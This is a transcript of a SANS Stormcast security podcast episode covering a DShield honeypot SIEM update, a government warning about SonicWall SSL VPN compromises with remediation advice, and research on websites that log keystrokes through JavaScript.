SANS Stormcast Friday, September 12th, 2025: DShield SIEM Update; Another Sonicwall Warning; Website Keystroke Logging

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9610.mp3

previous

DShield SIEM Update; Another Sonicwall Warning; Website Keystroke Logging

00:00

iTunes

MP3 Download

RSS Feed

Google

Podbean

Amazon Echo

YouTube

Spreaker

Spotify

Discussion

Login here to join the discussion.

Podcast Transcript

 Hello and welcome to the Friday, September 12, 2025
 edition of the SANS Internet Storm Centers Stormcast. My
 name is Johannes Ullrich, recording today from
 Jacksonville, Florida. And this episode is brought to you
 by the SANS.edu undergraduate certificate program in
 cybersecurity fundamentals. Today's diary is an update
 from Guy about the DShield SIEM that Guy maintains and
 actually he created it as well. One of the great things
 about running a honeypot is awareness about all the
 attacks that your network may be exposed to. This SIEM
 provides you with a real pretty graphical user
 interface summarizing the attacks that are hitting your
 honeypot and allowing you to eventually dig into the data
 more easily without having to break out your command line
 skills. And just the visualization itself is pretty
 nice and also provides quite a bit of value, I think, in
 particular to better understand how the attacks are
 breaking down. There is geographic maps that you can
 look at. There are various sort of port statistics and
 such that are being summarized here. Now, the nice thing
 about this SIEM is that it's actually entirely inside
 Docker containers and that makes it really easy to
 update. You essentially just remove the old Docker
 containers and then create new ones and you are up to date.
 So if you're using this tool, well, take a look at it. If
 you're not using it, well, take a look at it and see if
 you like it. It does require a little bit more processing
 power than you usually have, like on the basic Raspberry
 Pis. But if you are running your honeypot inside a virtual
 machine or on a little bit of more powerful system, it'll
 certainly work. It uses ELK, Elasticsearch, Logstash,
 Kibana, and those familiar with these tools will
 recognize also the overall UI that is presented by this
 SIEM. And yes, it's becoming sort of a recurring theme here
 that we have government agencies. Today, it's the
 Australian government's signals directorate noticing
 an increase in attacks against SonicWall SSL VPNs. They're
 linking it to an older last year's vulnerability. The big
 problem with all of these compromises is somewhat
 twofold. First of all, of course, some devices still
 aren't being patched. And the second one, that's a little
 bit the more tricky one, is that devices are patched. But
 at the time they were patched, they were already compromised.
 The attackers either left back doors behind, they added
 additional accounts, they stole credentials. So it's
 really important if you're patching these devices, don't
 just blindly patch. In particular, if this is not a
 super new vulnerability, like it's maybe a month old or so,
 assume compromise. Change credentials, change passwords,
 change SSH keys, change seats for two-factor authentication.
 And definitely do a quick review of what users are on
 the system, any odd binaries. Without at least some
 rudimentary incident response here, you're risking that the
 device has already been compromised. And really
 patching it is usually not going to evict the attacker.
 And a number of researchers from the US and Europe have
 collaborated to do a larger study on the use of keystroke
 detection in JavaScript on various websites. What happens
 here is that the websites include JavaScript that will
 basically record any keystroke while you're using the site.
 So even before you submit a particular form, the website
 may receive anything that you type, including things that
 you may then later delete before submitting a form. Now,
 sometimes this kind of code is being added as more something
 like a capture where they want to detect whether or not it's
 actually a human typing the text. Sometimes sort of for
 simple copy paste protection, which is an entire different
 story. But of course, the big problem here is that let's say
 you start typing your password by mistake into a username
 field or such. And even before submitting that password,
 well, that password has already been sent to the
 respective websites. So there's a real privacy risk
 here. As a little side note to this, had recently a student
 here at sans.edu write a paper about some of these tracking
 technologies, not just JavaScript based, but also
 others like Canvas and such based and comparing malicious
 and non malicious websites. And well, the sad truth is
 that malicious and non malicious websites use exactly
 the same techniques at exactly pretty much the same
 prevalence. As a user, not much you can do to protect
 yourself here. Sometimes interesting to sort of in your
 developer tools, in your browser to observe the network
 request. You can sometimes see what's happening there. But
 just be aware that this is happening. Be careful how you
 type, what you type and assume that anything that you type in
 a particular website is being transmitted to the website,
 even if you don't explicitly click submit. Well, and that's
 it for today. Thanks again for listening. Thanks for
 subscribing and liking this podcast. Did I miss a story
 that I should have covered? Well, please send me links to
 stories. Also, if you discovered something yourself,
 if you wrote an interesting paper, always interested to
 hear from authors, not so much from marketing departments
 alike. But anyway, that's it for today. Thanks for
 listening and talk to you again on Monday. Bye.